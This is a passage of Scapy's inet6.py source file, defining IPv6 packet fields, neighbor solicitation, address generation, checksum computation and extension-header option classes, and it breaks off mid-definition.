1#! /usr/bin/env python 2############################################################################# 3## ## 4## inet6.py --- IPv6 support for Scapy ## 5## see http://natisbad.org/IPv6/ ## 6## for more informations ## 7## ## 8## Copyright (C) 2005 Guillaume Valadon <guedou@hongo.wide.ad.jp> ## 9## Arnaud Ebalard <arnaud.ebalard@eads.net> ## 10## ## 11## This program is free software; you can redistribute it and/or modify it ## 12## under the terms of the GNU General Public License version 2 as ## 13## published by the Free Software Foundation. ## 14## ## 15## This program is distributed in the hope that it will be useful, but ## 16## WITHOUT ANY WARRANTY; without even the implied warranty of ## 17## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## 18## General Public License for more details. ## 19## ## 20############################################################################# 21 22""" 23IPv6 (Internet Protocol v6). 24""" 25 26 27from __future__ import absolute_import 28from __future__ import print_function 29 30from hashlib import md5 31import random 32import re 33import socket 34import struct 35from time import gmtime, strftime 36 37import scapy.modules.six as six 38from scapy.modules.six.moves import range, zip 39if not socket.has_ipv6: 40 raise socket.error("can't use AF_INET6, IPv6 is disabled") 41if not hasattr(socket, "IPPROTO_IPV6"): 42 # Workaround for http://bugs.python.org/issue6926 43 socket.IPPROTO_IPV6 = 41 44if not hasattr(socket, "IPPROTO_IPIP"): 45 # Workaround for https://bitbucket.org/secdev/scapy/issue/5119 46 socket.IPPROTO_IPIP = 4 47 48from scapy.arch import get_if_hwaddr 49from scapy.config import conf 50from scapy.base_classes import Gen 51from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \ 52 MTU 53from scapy.compat import chb, orb, raw, plain_str 54import scapy.consts 55from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ 56 DestField, Field, FieldLenField, FlagsField, IntField, LongField, \ 57 MACField, PacketLenField, PacketListField, ShortEnumField, ShortField, \ 58 StrField, StrFixedLenField, StrLenField, X3BytesField, XBitField, \ 59 XIntField, XShortField 60from scapy.packet import bind_layers, Packet, Raw 61from scapy.volatile import RandInt, RandIP6, RandShort 62from scapy.sendrecv import sendp, sniff, sr, srp1 63from scapy.as_resolvers import AS_resolver_riswhois 64from scapy.supersocket import SuperSocket, L3RawSocket 65from scapy.utils6 import in6_6to4ExtractAddr, in6_and, in6_cidr2mask, \ 66 in6_getnsma, in6_getnsmac, in6_isaddr6to4, in6_isaddrllallnodes, \ 67 in6_isaddrllallservers, in6_isaddrTeredo, in6_isllsnmaddr, in6_ismaddr, \ 68 in6_ptop, teredoAddrExtractInfo 69from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP 70from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \ 71 UDP, UDPerror 72from scapy.utils import checksum, inet_pton, inet_ntop, strxor 73from scapy.error import warning 74if conf.route6 is None: 75 # unused import, only to initialize conf.route6 76 import scapy.route6 77 78 79############################################################################# 80# Helpers ## 81############################################################################# 82 83def get_cls(name, fallback_cls): 84 return globals().get(name, fallback_cls) 85 86 87########################## 88## Neighbor cache stuff ## 89########################## 90 91conf.netcache.new_cache("in6_neighbor", 120) 92 93@conf.commands.register 94def neighsol(addr, src, iface, timeout=1, chainCC=0): 95 """Sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with specified IPv6 address addr 96 97 'src' address is used as source of the message. Message is sent on iface. 98 By default, timeout waiting for an answer is 1 second. 99 100 If no answer is gathered, None is returned. Else, the answer is 101 returned (ethernet frame). 102 """ 103 104 nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) 105 d = inet_ntop(socket.AF_INET6, nsma) 106 dm = in6_getnsmac(nsma) 107 p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255) 108 p /= ICMPv6ND_NS(tgt=addr) 109 p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface)) 110 res = srp1(p,type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0, 111 chainCC=chainCC) 112 113 return res 114 115@conf.commands.register 116def getmacbyip6(ip6, chainCC=0): 117 """Returns the MAC address corresponding to an IPv6 address 118 119 neighborCache.get() method is used on instantiated neighbor cache. 120 Resolution mechanism is described in associated doc string. 121 122 (chainCC parameter value ends up being passed to sending function 123 used to perform the resolution, if needed) 124 """ 125 126 if isinstance(ip6, Net6): 127 ip6 = str(ip6) 128 129 if in6_ismaddr(ip6): # Multicast 130 mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) 131 return mac 132 133 iff,a,nh = conf.route6.route(ip6) 134 135 if iff == scapy.consts.LOOPBACK_INTERFACE: 136 return "ff:ff:ff:ff:ff:ff" 137 138 if nh != '::': 139 ip6 = nh # Found next hop 140 141 mac = conf.netcache.in6_neighbor.get(ip6) 142 if mac: 143 return mac 144 145 res = neighsol(ip6, a, iff, chainCC=chainCC) 146 147 if res is not None: 148 if ICMPv6NDOptDstLLAddr in res: 149 mac = res[ICMPv6NDOptDstLLAddr].lladdr 150 else: 151 mac = res.src 152 conf.netcache.in6_neighbor[ip6] = mac 153 return mac 154 155 return None 156 157 158############################################################################# 159############################################################################# 160### IPv6 addresses manipulation routines ### 161############################################################################# 162############################################################################# 163 164class Net6(Gen): # syntax ex. fec0::/126 165 """Generate a list of IPv6s from a network address or a name""" 166 name = "ipv6" 167 ip_regex = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$") 168 169 def __init__(self, net): 170 self.repr = net 171 172 tmp = net.split('/')+["128"] 173 if not self.ip_regex.match(net): 174 tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0] 175 176 netmask = int(tmp[1]) 177 self.net = inet_pton(socket.AF_INET6, tmp[0]) 178 self.mask = in6_cidr2mask(netmask) 179 self.plen = netmask 180 181 def __iter__(self): 182 183 def parse_digit(value, netmask): 184 netmask = min(8, max(netmask, 0)) 185 value = int(value) 186 return (value & (0xff << netmask), 187 (value | (0xff >> (8 - netmask))) + 1) 188 189 self.parsed = [ 190 parse_digit(x, y) for x, y in zip( 191 struct.unpack("16B", in6_and(self.net, self.mask)), 192 (x - self.plen for x in range(8, 129, 8)), 193 ) 194 ] 195 196 def rec(n, l): 197 sep = ':' if n and n % 2 == 0 else '' 198 if n == 16: 199 return l 200 return rec(n + 1, [y + sep + '%.2x' % i 201 # faster than '%s%s%.2x' % (y, sep, i) 202 for i in range(*self.parsed[n]) 203 for y in l]) 204 205 return iter(rec(0, [''])) 206 207 def __str__(self): 208 try: 209 return next(self.__iter__()) 210 except StopIteration: 211 return None 212 213 def __eq__(self, other): 214 return str(other) == str(self) 215 216 def __ne__(self, other): 217 return str(other) != str(self) 218 219 def __repr__(self): 220 return "Net6(%r)" % self.repr 221 222 223 224 225 226 227############################################################################# 228############################################################################# 229### IPv6 Class ### 230############################################################################# 231############################################################################# 232 233class IP6Field(Field): 234 def __init__(self, name, default): 235 Field.__init__(self, name, default, "16s") 236 def h2i(self, pkt, x): 237 if isinstance(x, str): 238 try: 239 x = in6_ptop(x) 240 except socket.error: 241 x = Net6(x) 242 elif isinstance(x, list): 243 x = [Net6(a) for a in x] 244 return x 245 def i2m(self, pkt, x): 246 return inet_pton(socket.AF_INET6, plain_str(x)) 247 def m2i(self, pkt, x): 248 return inet_ntop(socket.AF_INET6, x) 249 def any2i(self, pkt, x): 250 return self.h2i(pkt,x) 251 def i2repr(self, pkt, x): 252 if x is None: 253 return self.i2h(pkt,x) 254 elif not isinstance(x, Net6) and not isinstance(x, list): 255 if in6_isaddrTeredo(x): # print Teredo info 256 server, _, maddr, mport = teredoAddrExtractInfo(x) 257 return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport) 258 elif in6_isaddr6to4(x): # print encapsulated address 259 vaddr = in6_6to4ExtractAddr(x) 260 return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr) 261 return self.i2h(pkt, x) # No specific information to return 262 def randval(self): 263 return RandIP6() 264 265class SourceIP6Field(IP6Field): 266 __slots__ = ["dstname"] 267 def __init__(self, name, dstname): 268 IP6Field.__init__(self, name, None) 269 self.dstname = dstname 270 def i2m(self, pkt, x): 271 if x is None: 272 dst=getattr(pkt,self.dstname) 273 iff,x,nh = conf.route6.route(dst) 274 return IP6Field.i2m(self, pkt, x) 275 def i2h(self, pkt, x): 276 if x is None: 277 if conf.route6 is None: 278 # unused import, only to initialize conf.route6 279 import scapy.route6 280 dst = ("::" if self.dstname is None else getattr(pkt, self.dstname)) 281 if isinstance(dst, (Gen, list)): 282 r = {conf.route6.route(daddr) for daddr in dst} 283 if len(r) > 1: 284 warning("More than one possible route for %r" % (dst,)) 285 x = min(r)[1] 286 else: 287 x = conf.route6.route(dst)[1] 288 return IP6Field.i2h(self, pkt, x) 289 290class DestIP6Field(IP6Field, DestField): 291 bindings = {} 292 def __init__(self, name, default): 293 IP6Field.__init__(self, name, None) 294 DestField.__init__(self, name, default) 295 def i2m(self, pkt, x): 296 if x is None: 297 x = self.dst_from_pkt(pkt) 298 return IP6Field.i2m(self, pkt, x) 299 def i2h(self, pkt, x): 300 if x is None: 301 x = self.dst_from_pkt(pkt) 302 return IP6Field.i2h(self, pkt, x) 303 304ipv6nh = { 0:"Hop-by-Hop Option Header", 305 4:"IP", 306 6:"TCP", 307 17:"UDP", 308 41:"IPv6", 309 43:"Routing Header", 310 44:"Fragment Header", 311 47:"GRE", 312 50:"ESP Header", 313 51:"AH Header", 314 58:"ICMPv6", 315 59:"No Next Header", 316 60:"Destination Option Header", 317 112:"VRRP", 318 132:"SCTP", 319 135:"Mobility Header"} 320 321ipv6nhcls = { 0: "IPv6ExtHdrHopByHop", 322 4: "IP", 323 6: "TCP", 324 17: "UDP", 325 43: "IPv6ExtHdrRouting", 326 44: "IPv6ExtHdrFragment", 327 #50: "IPv6ExtHrESP", 328 #51: "IPv6ExtHdrAH", 329 58: "ICMPv6Unknown", 330 59: "Raw", 331 60: "IPv6ExtHdrDestOpt" } 332 333class IP6ListField(StrField): 334 __slots__ = ["count_from", "length_from"] 335 islist = 1 336 def __init__(self, name, default, count_from=None, length_from=None): 337 if default is None: 338 default = [] 339 StrField.__init__(self, name, default) 340 self.count_from = count_from 341 self.length_from = length_from 342 343 def i2len(self, pkt, i): 344 return 16*len(i) 345 346 def i2count(self, pkt, i): 347 if isinstance(i, list): 348 return len(i) 349 return 0 350 351 def getfield(self, pkt, s): 352 c = l = None 353 if self.length_from is not None: 354 l = self.length_from(pkt) 355 elif self.count_from is not None: 356 c = self.count_from(pkt) 357 358 lst = [] 359 ret = b"" 360 remain = s 361 if l is not None: 362 remain,ret = s[:l],s[l:] 363 while remain: 364 if c is not None: 365 if c <= 0: 366 break 367 c -= 1 368 addr = inet_ntop(socket.AF_INET6, remain[:16]) 369 lst.append(addr) 370 remain = remain[16:] 371 return remain+ret,lst 372 373 def i2m(self, pkt, x): 374 s = b"" 375 for y in x: 376 try: 377 y = inet_pton(socket.AF_INET6, y) 378 except: 379 y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0] 380 y = inet_pton(socket.AF_INET6, y) 381 s += y 382 return s 383 384 def i2repr(self,pkt,x): 385 s = [] 386 if x == None: 387 return "[]" 388 for y in x: 389 s.append('%s' % y) 390 return "[ %s ]" % (", ".join(s)) 391 392class _IPv6GuessPayload: 393 name = "Dummy class that implements guess_payload_class() for IPv6" 394 def default_payload_class(self,p): 395 if self.nh == 58: # ICMPv6 396 t = orb(p[0]) 397 if len(p) > 2 and (t == 139 or t == 140): # Node Info Query 398 return _niquery_guesser(p) 399 if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages 400 return get_cls(icmp6typescls.get(t,"Raw"), "Raw") 401 return Raw 402 elif self.nh == 135 and len(p) > 3: # Mobile IPv6 403 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic) 404 elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header 405 return IPv6ExtHdrSegmentRouting 406 return get_cls(ipv6nhcls.get(self.nh, "Raw"), "Raw") 407 408class IPv6(_IPv6GuessPayload, Packet, IPTools): 409 name = "IPv6" 410 fields_desc = [ BitField("version" , 6 , 4), 411 BitField("tc", 0, 8), #TODO: IPv6, ByteField ? 412 BitField("fl", 0, 20), 413 ShortField("plen", None), 414 ByteEnumField("nh", 59, ipv6nh), 415 ByteField("hlim", 64), 416 SourceIP6Field("src", "dst"), # dst is for src @ selection 417 DestIP6Field("dst", "::1") ] 418 419 def route(self): 420 dst = self.dst 421 if isinstance(dst,Gen): 422 dst = next(iter(dst)) 423 return conf.route6.route(dst) 424 425 def mysummary(self): 426 return "%s > %s (%i)" % (self.src, self.dst, self.nh) 427 428 def post_build(self, p, pay): 429 p += pay 430 if self.plen is None: 431 l = len(p) - 40 432 p = p[:4]+struct.pack("!H", l)+p[6:] 433 return p 434 435 def extract_padding(self, s): 436 l = self.plen 437 return s[:l], s[l:] 438 439 def hashret(self): 440 if self.nh == 58 and isinstance(self.payload, _ICMPv6): 441 if self.payload.type < 128: 442 return self.payload.payload.hashret() 443 elif (self.payload.type in [133,134,135,136,144,145]): 444 return struct.pack("B", self.nh)+self.payload.hashret() 445 446 if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6 447 return self.payload.hashret() 448 449 nh = self.nh 450 sd = self.dst 451 ss = self.src 452 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting): 453 # With routing header, the destination is the last 454 # address of the IPv6 list if segleft > 0 455 nh = self.payload.nh 456 try: 457 sd = self.addresses[-1] 458 except IndexError: 459 sd = '::1' 460 # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 461 # could be anything from the original list ... 462 if 1: 463 sd = inet_pton(socket.AF_INET6, sd) 464 for a in self.addresses: 465 a = inet_pton(socket.AF_INET6, a) 466 sd = strxor(sd, a) 467 sd = inet_ntop(socket.AF_INET6, sd) 468 469 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): 470 # With segment routing header (rh == 4), the destination is 471 # the first address of the IPv6 addresses list 472 try: 473 sd = self.addresses[0] 474 except IndexError: 475 sd = self.dst 476 477 if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment): 478 nh = self.payload.nh 479 480 if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop): 481 nh = self.payload.nh 482 483 if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): 484 foundhao = None 485 for o in self.payload.options: 486 if isinstance(o, HAO): 487 foundhao = o 488 if foundhao: 489 nh = self.payload.nh # XXX what if another extension follows ? 490 ss = foundhao.hoa 491 492 if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd): 493 sd = inet_pton(socket.AF_INET6, sd) 494 ss = inet_pton(socket.AF_INET6, self.src) 495 return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() 496 else: 497 return struct.pack("B", nh)+self.payload.hashret() 498 499 def answers(self, other): 500 if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP 501 if self.nh in [4, 41]: 502 return self.payload.answers(other) 503 if isinstance(other, IPv6) and other.nh in [4, 41]: 504 return self.answers(other.payload) 505 if isinstance(other, IP) and other.proto in [4, 41]: 506 return self.answers(other.payload) 507 if not isinstance(other, IPv6): # self is reply, other is request 508 return False 509 if conf.checkIPaddr: 510 # ss = inet_pton(socket.AF_INET6, self.src) 511 sd = inet_pton(socket.AF_INET6, self.dst) 512 os = inet_pton(socket.AF_INET6, other.src) 513 od = inet_pton(socket.AF_INET6, other.dst) 514 # request was sent to a multicast address (other.dst) 515 # Check reply destination addr matches request source addr (i.e 516 # sd == os) except when reply is multicasted too 517 # XXX test mcast scope matching ? 518 if in6_ismaddr(other.dst): 519 if in6_ismaddr(self.dst): 520 if ((od == sd) or 521 (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): 522 return self.payload.answers(other.payload) 523 return False 524 if (os == sd): 525 return self.payload.answers(other.payload) 526 return False 527 elif (sd != os): # or ss != od): <- removed for ICMP errors 528 return False 529 if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: 530 # ICMPv6 Error message -> generated by IPv6 packet 531 # Note : at the moment, we jump the ICMPv6 specific class 532 # to call answers() method of erroneous packet (over 533 # initial packet). There can be cases where an ICMPv6 error 534 # class could implement a specific answers method that perform 535 # a specific task. Currently, don't see any use ... 536 return self.payload.payload.answers(other) 537 elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop): 538 return self.payload.answers(other.payload.payload) 539 elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment): 540 return self.payload.answers(other.payload.payload) 541 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting): 542 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting 543 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): 544 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting 545 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): 546 return self.payload.payload.answers(other.payload.payload) 547 elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance 548 return self.payload.payload.answers(other.payload) 549 else: 550 if (self.nh != other.nh): 551 return False 552 return self.payload.answers(other.payload) 553 554 555class _IPv46(IP): 556 """ 557 This class implements a dispatcher that is used to detect the IP version 558 while parsing Raw IP pcap files. 559 """ 560 @classmethod 561 def dispatch_hook(cls, _pkt=None, *_, **kargs): 562 if _pkt: 563 if orb(_pkt[0]) >> 4 == 6: 564 return IPv6 565 elif kargs.get("version") == 6: 566 return IPv6 567 return IP 568 569 570def inet6_register_l3(l2, l3): 571 return getmacbyip6(l3.dst) 572conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3) 573 574 575class IPerror6(IPv6): 576 name = "IPv6 in ICMPv6" 577 def answers(self, other): 578 if not isinstance(other, IPv6): 579 return False 580 sd = inet_pton(socket.AF_INET6, self.dst) 581 ss = inet_pton(socket.AF_INET6, self.src) 582 od = inet_pton(socket.AF_INET6, other.dst) 583 os = inet_pton(socket.AF_INET6, other.src) 584 585 # Make sure that the ICMPv6 error is related to the packet scapy sent 586 if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128: 587 588 # find upper layer for self (possible citation) 589 selfup = self.payload 590 while selfup is not None and isinstance(selfup, _IPv6ExtHdr): 591 selfup = selfup.payload 592 593 # find upper layer for other (initial packet). Also look for RH 594 otherup = other.payload 595 request_has_rh = False 596 while otherup is not None and isinstance(otherup, _IPv6ExtHdr): 597 if isinstance(otherup, IPv6ExtHdrRouting): 598 request_has_rh = True 599 otherup = otherup.payload 600 601 if ((ss == os and sd == od) or # <- Basic case 602 (ss == os and request_has_rh)): # <- Request has a RH : 603 # don't check dst address 604 605 # Let's deal with possible MSS Clamping 606 if (isinstance(selfup, TCP) and 607 isinstance(otherup, TCP) and 608 selfup.options != otherup.options): # seems clamped 609 610 # Save fields modified by MSS clamping 611 old_otherup_opts = otherup.options 612 old_otherup_cksum = otherup.chksum 613 old_otherup_dataofs = otherup.dataofs 614 old_selfup_opts = selfup.options 615 old_selfup_cksum = selfup.chksum 616 old_selfup_dataofs = selfup.dataofs 617 618 # Nullify them 619 otherup.options = [] 620 otherup.chksum = 0 621 otherup.dataofs = 0 622 selfup.options = [] 623 selfup.chksum = 0 624 selfup.dataofs = 0 625 626 # Test it and save result 627 s1 = raw(selfup) 628 s2 = raw(otherup) 629 l = min(len(s1), len(s2)) 630 res = s1[:l] == s2[:l] 631 632 # recall saved values 633 otherup.options = old_otherup_opts 634 otherup.chksum = old_otherup_cksum 635 otherup.dataofs = old_otherup_dataofs 636 selfup.options = old_selfup_opts 637 selfup.chksum = old_selfup_cksum 638 selfup.dataofs = old_selfup_dataofs 639 640 return res 641 642 s1 = raw(selfup) 643 s2 = raw(otherup) 644 l = min(len(s1), len(s2)) 645 return s1[:l] == s2[:l] 646 647 return False 648 649 def mysummary(self): 650 return Packet.mysummary(self) 651 652 653############################################################################# 654############################################################################# 655### Upper Layer Checksum computation ### 656############################################################################# 657############################################################################# 658 659class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation 660 name = "Pseudo IPv6 Header" 661 fields_desc = [ IP6Field("src", "::"), 662 IP6Field("dst", "::"), 663 ShortField("uplen", None), 664 BitField("zero", 0, 24), 665 ByteField("nh", 0) ] 666 667def in6_chksum(nh, u, p): 668 """ 669 As Specified in RFC 2460 - 8.1 Upper-Layer Checksums 670 671 Performs IPv6 Upper Layer checksum computation. Provided parameters are: 672 - 'nh' : value of upper layer protocol 673 - 'u' : upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be 674 provided with all under layers (IPv6 and all extension headers, 675 for example) 676 - 'p' : the payload of the upper layer provided as a string 677 678 Functions operate by filling a pseudo header class instance (PseudoIPv6) 679 with 680 - Next Header value 681 - the address of _final_ destination (if some Routing Header with non 682 segleft field is present in underlayer classes, last address is used.) 683 - the address of _real_ source (basically the source address of an 684 IPv6 class instance available in the underlayer or the source address 685 in HAO option if some Destination Option header found in underlayer 686 includes this option). 687 - the length is the length of provided payload string ('p') 688 """ 689 690 ph6 = PseudoIPv6() 691 ph6.nh = nh 692 rthdr = 0 693 hahdr = 0 694 final_dest_addr_found = 0 695 while u != None and not isinstance(u, IPv6): 696 if (isinstance(u, IPv6ExtHdrRouting) and 697 u.segleft != 0 and len(u.addresses) != 0 and 698 final_dest_addr_found == 0): 699 rthdr = u.addresses[-1] 700 final_dest_addr_found = 1 701 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and 702 u.segleft != 0 and len(u.addresses) != 0 and 703 final_dest_addr_found == 0): 704 rthdr = u.addresses[0] 705 final_dest_addr_found = 1 706 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and 707 isinstance(u.options[0], HAO)): 708 hahdr = u.options[0].hoa 709 u = u.underlayer 710 if u is None: 711 warning("No IPv6 underlayer to compute checksum. Leaving null.") 712 return 0 713 if hahdr: 714 ph6.src = hahdr 715 else: 716 ph6.src = u.src 717 if rthdr: 718 ph6.dst = rthdr 719 else: 720 ph6.dst = u.dst 721 ph6.uplen = len(p) 722 ph6s = raw(ph6) 723 return checksum(ph6s+p) 724 725 726############################################################################# 727############################################################################# 728### Extension Headers ### 729############################################################################# 730############################################################################# 731 732 733# Inherited by all extension header classes 734class _IPv6ExtHdr(_IPv6GuessPayload, Packet): 735 name = 'Abstract IPV6 Option Header' 736 aliastypes = [IPv6, IPerror6] # TODO ... 737 738 739#################### IPv6 options for Extension Headers ##################### 740 741_hbhopts = { 0x00: "Pad1", 742 0x01: "PadN", 743 0x04: "Tunnel Encapsulation Limit", 744 0x05: "Router Alert", 745 0x06: "Quick-Start", 746 0xc2: "Jumbo Payload", 747 0xc9: "Home Address Option" } 748 749class _OTypeField(ByteEnumField): 750 """ 751 Modified BytEnumField that displays information regarding the IPv6 option 752 based on its option type value (What should be done by nodes that process 753 the option if they do not understand it ...) 754 755 It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options 756 """ 757 pol = {0x00: "00: skip", 758 0x40: "01: discard", 759 0x80: "10: discard+ICMP", 760 0xC0: "11: discard+ICMP not mcast"} 761 762 enroutechange = {0x00: "0: Don't change en-route", 763 0x20: "1: May change en-route" } 764 765 def i2repr(self, pkt, x): 766 s = self.i2s.get(x, repr(x)) 767 polstr = self.pol[(x & 0xC0)] 768 enroutechangestr = self.enroutechange[(x & 0x20)] 769 return "%s [%s, %s]" % (s, polstr, enroutechangestr) 770 771class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option 772 name = "Scapy6 Unknown Option" 773 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 774 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 775 StrLenField("optdata", "", 776 length_from = lambda pkt: pkt.optlen) ] 777 def alignment_delta(self, curpos): # By default, no alignment requirement 778 """ 779 As specified in section 4.2 of RFC 2460, every options has 780 an alignment requirement ususally expressed xn+y, meaning 781 the Option Type must appear at an integer multiple of x octest 782 from the start of the header, plus y octet. 783 784 That function is provided the current position from the 785 start of the header and returns required padding length. 786 """ 787 return 0 788 789class Pad1(Packet): # IPv6 Hop-By-Hop Option 790 name = "Pad1" 791 fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ] 792 def alignment_delta(self, curpos): # No alignment requirement 793 return 0 794 795class PadN(Packet): # IPv6 Hop-By-Hop Option 796 name = "PadN" 797 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 798 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 799 StrLenField("optdata", "", 800 length_from = lambda pkt: pkt.optlen)] 801 def alignment_delta(self, curpos): # No alignment requirement 802 return 0 803 804class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option 805 name = "Router Alert" 806 fields_desc = [_OTypeField("otype", 0x05, _hbhopts), 807 ByteField("optlen", 2), 808 ShortEnumField("value", None, 809 { 0: "Datagram contains a MLD message", 810 1: "Datagram contains RSVP message", 811 2: "Datagram contains an Active Network message", 812 68: "NSIS NATFW NSLP", 813 69: "MPLS OAM", 814 65535: "Reserved" })] 815 # TODO : Check IANA has not defined new values for value field of RouterAlertOption 816 # TODO : Now that we have that option, we should do something in MLD class that need it 817 # TODO : IANA has defined ranges of values which can't be easily represented here. 818 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml 819 def alignment_delta(self, curpos): # alignment requirement : 2n+0 820 x = 2 ; y = 0 821 delta = x*((curpos - y + x - 1)//x) + y - curpos 822 return delta 823 824class Jumbo(Packet): # IPv6 Hop-By-Hop Option 825 name = "Jumbo Payload" 826 fields_desc = [_OTypeField("otype", 0xC2, _hbhopts), 827 ByteField("optlen", 4), 828 IntField("jumboplen", None) ] 829 def alignment_delta(self, curpos): # alignment requirement : 4n+2 830 x = 4 ; y = 2 831 delta = x*((curpos - y + x - 1)//x) + y - curpos 832 return delta 833 834class HAO(Packet): # IPv6 Destination Options Header Option 835 name = "Home Address Option" 836 fields_desc = [_OTypeField("otype", 0xC9, _hbhopts), 837 ByteField("optlen", 16), 838 IP6Field("hoa", "::") ] 839 def alignment_delta(self, curpos): # alignment requirement : 8n+6 840 x = 8 ; y = 6 841 delta = x*((curpos - y + x - 1)//x) + y - curpos 842 return delta 843 844_hbhoptcls = { 0x00: Pad1, 845 0x01: PadN, 846 0x05: RouterAlert, 847 0xC2: Jumbo, 848 0xC9: HAO } 849 850 851######################## Hop-by-Hop Extension Header ######################## 852 853class _HopByHopOptionsField(PacketListField): 854 __slots__ = ["curpos"] 855 def __init__(self, name, default, cls, curpos, count_from=None, length_from=None): 856 self.curpos = curpos 857 PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from) 858 859 def i2len(self, pkt, i): 860 l = len(self.i2m(pkt, i)) 861 return l 862 863 def i2count(self, pkt, i): 864 if isinstance(i, list): 865 return len(i) 866 return 0 867 868 def getfield(self, pkt, s): 869 c = l = None 870 if self.length_from is not None: 871 l = self.length_from(pkt) 872 elif self.count_from is not None: 873 c = self.count_from(pkt) 874 875 opt = [] 876 ret = b"" 877 x = s 878 if l is not None: 879 x,ret = s[:l],s[l:] 880 while x: 881 if c is not None: 882 if c <= 0: 883 break 884 c -= 1 885 o = orb(x[0]) # Option type 886 cls = self.cls 887 if o in _hbhoptcls: 888 cls = _hbhoptcls[o] 889 try: 890 op = cls(x) 891 except: 892 op = self.cls(x) 893 opt.append(op) 894 if isinstance(op.payload, conf.raw_layer): 895 x = op.payload.load 896 del(op.payload) 897 else: 898 x = b"" 899 return x+ret,opt 900 901 def i2m(self, pkt, x): 902 autopad = None 903 try: 904 autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field 905 except: 906 autopad = 1 907 908 if not autopad: 909 return b"".join(map(str, x)) 910 911 curpos = self.curpos 912 s = b"" 913 for p in x: 914 d = p.alignment_delta(curpos) 915 curpos += d 916 if d == 1: 917 s += raw(Pad1()) 918 elif d != 0: 919 s += raw(PadN(optdata=b'\x00'*(d-2))) 920 pstr = raw(p) 921 curpos += len(pstr) 922 s += pstr 923 924 # Let's make the class including our option field 925 # a multiple of 8 octets long 926 d = curpos % 8 927 if d == 0: 928 return s 929 d = 8 - d 930 if d == 1: 931 s += raw(Pad1()) 932 elif d != 0: 933 s += raw(PadN(optdata=b'\x00'*(d-2))) 934 935 return s 936 937 def addfield(self, pkt, s, val): 938 return s+self.i2m(pkt, val) 939 940class _PhantomAutoPadField(ByteField): 941 def addfield(self, pkt, s, val): 942 return s 943 944 def getfield(self, pkt, s): 945 return s, 1 946 947 def i2repr(self, pkt, x): 948 if x: 949 return "On" 950 return "Off" 951 952 953class IPv6ExtHdrHopByHop(_IPv6ExtHdr): 954 name = "IPv6 Extension Header - Hop-by-Hop Options Header" 955 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 956 FieldLenField("len", None, length_of="options", fmt="B", 957 adjust = lambda pkt,x: (x+2+7)//8 - 1), 958 _PhantomAutoPadField("autopad", 1), # autopad activated by default 959 _HopByHopOptionsField("options", [], HBHOptUnknown, 2, 960 length_from = lambda pkt: (8*(pkt.len+1))-2) ] 961 overload_fields = {IPv6: { "nh": 0 }} 962 963 964######################## Destination Option Header ########################## 965 966class IPv6ExtHdrDestOpt(_IPv6ExtHdr): 967 name = "IPv6 Extension Header - Destination Options Header" 968 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 969 FieldLenField("len", None, length_of="options", fmt="B", 970 adjust = lambda pkt,x: (x+2+7)//8 - 1), 971 _PhantomAutoPadField("autopad", 1), # autopad activated by default 972 _HopByHopOptionsField("options", [], HBHOptUnknown, 2, 973 